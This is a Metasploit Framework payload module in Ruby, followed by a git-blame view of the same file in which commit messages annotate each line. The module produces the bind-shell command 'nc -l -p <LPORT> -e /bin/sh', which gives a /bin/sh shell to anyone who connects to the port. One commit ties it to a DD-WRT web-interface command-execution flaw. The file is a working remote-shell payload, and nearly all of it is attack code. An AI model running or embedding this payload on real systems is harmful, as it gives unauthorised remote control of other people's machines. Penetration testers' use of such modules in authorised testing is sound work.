metasploit-framework/modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'

module Metasploit3

  CachedSize = 24

  include Msf::Payload::Single
  include Msf::Sessions::CommandShellOptions

  def initialize(info = {})
    super(merge_info(info,
      'Name'          => 'Unix Command Shell, Bind TCP (via netcat -e)',
      'Description'   => 'Listen for a connection and spawn a command shell via netcat',
      'Author'        => 'hdm',
      'License'       => MSF_LICENSE,
      'Platform'      => 'unix',
      'Arch'          => ARCH_CMD,
      'Handler'       => Msf::Handler::BindTcp,
      'Session'       => Msf::Sessions::CommandShell,
      'PayloadType'   => 'cmd',
      'RequiredCmd'   => 'netcat-e',
      'Payload'       =>
        {
          'Offsets' => { },
          'Payload' => ''
        }
      ))
  end

  #
  # Constructs the payload
  #
  def generate
    return super + command_string
  end

  #
  # Returns the command string to use for execution
  #
  def command_string
    "nc -l -p #{datastore['LPORT']} -e /bin/sh"
  end

end
Adds coverage for the DD-WRT web interface command execution flaw, adds two netcat -e payloads to work with it git-svn-id: file:///home/svn/framework3/trunk@6852 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-21 12:56:42 +00:00			`##`
Fix up comment splats with the correct URI See the complaint on #4039. This doesn't fix that particular issue (it's somewhat unrelated), but does solve around a file parsing problem reported by @void-in 2014-10-17 16:47:33 +00:00			`# This module requires Metasploit: http://metasploit.com/download`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Adds coverage for the DD-WRT web interface command execution flaw, adds two netcat -e payloads to work with it git-svn-id: file:///home/svn/framework3/trunk@6852 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-21 12:56:42 +00:00			`##`

			`require 'msf/core'`
			`require 'msf/core/handler/bind_tcp'`
			`require 'msf/base/sessions/command_shell'`
adds scripting for command shell sessions 1. InitialAutoRunScript and AutoRunScript vars work 2. scripts/shells was created to hold them 3. _shell methods were renamed shell_ 4. added "shell_command" method to command shell sessions 5. converted all uses of _shell to shell_ 6. all payloads that produce command shell sessions include Msf::Sessions::CommandShellOptions git-svn-id: file:///home/svn/framework3/trunk@8615 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-24 01:19:59 +00:00			`require 'msf/base/sessions/command_shell_options'`
Adds coverage for the DD-WRT web interface command execution flaw, adds two netcat -e payloads to work with it git-svn-id: file:///home/svn/framework3/trunk@6852 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-21 12:56:42 +00:00
			`module Metasploit3`

The result of running ./tools/update_payload_cached_sizes.rb 2015-03-09 20:31:04 +00:00			`CachedSize = 24`

Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Payload::Single`
			`include Msf::Sessions::CommandShellOptions`
Adds coverage for the DD-WRT web interface command execution flaw, adds two netcat -e payloads to work with it git-svn-id: file:///home/svn/framework3/trunk@6852 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-21 12:56:42 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def initialize(info = {})`
			`super(merge_info(info,`
			`'Name' => 'Unix Command Shell, Bind TCP (via netcat -e)',`
			`'Description' => 'Listen for a connection and spawn a command shell via netcat',`
			`'Author' => 'hdm',`
			`'License' => MSF_LICENSE,`
			`'Platform' => 'unix',`
			`'Arch' => ARCH_CMD,`
			`'Handler' => Msf::Handler::BindTcp,`
			`'Session' => Msf::Sessions::CommandShell,`
			`'PayloadType' => 'cmd',`
			`'RequiredCmd' => 'netcat-e',`
			`'Payload' =>`
			`{`
			`'Offsets' => { },`
			`'Payload' => ''`
			`}`
			`))`
			`end`
Adds coverage for the DD-WRT web interface command execution flaw, adds two netcat -e payloads to work with it git-svn-id: file:///home/svn/framework3/trunk@6852 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-21 12:56:42 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`#`
			`# Constructs the payload`
			`#`
			`def generate`
			`return super + command_string`
			`end`
adds scripting for command shell sessions 1. InitialAutoRunScript and AutoRunScript vars work 2. scripts/shells was created to hold them 3. _shell methods were renamed shell_ 4. added "shell_command" method to command shell sessions 5. converted all uses of _shell to shell_ 6. all payloads that produce command shell sessions include Msf::Sessions::CommandShellOptions git-svn-id: file:///home/svn/framework3/trunk@8615 4d416f70-5f16-0410-b530-b9f4589650da 2010-02-24 01:19:59 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`#`
			`# Returns the command string to use for execution`
			`#`
			`def command_string`
			`"nc -l -p #{datastore['LPORT']} -e /bin/sh"`
			`end`
Adds coverage for the DD-WRT web interface command execution flaw, adds two netcat -e payloads to work with it git-svn-id: file:///home/svn/framework3/trunk@6852 4d416f70-5f16-0410-b530-b9f4589650da 2009-07-21 12:56:42 +00:00
			`end`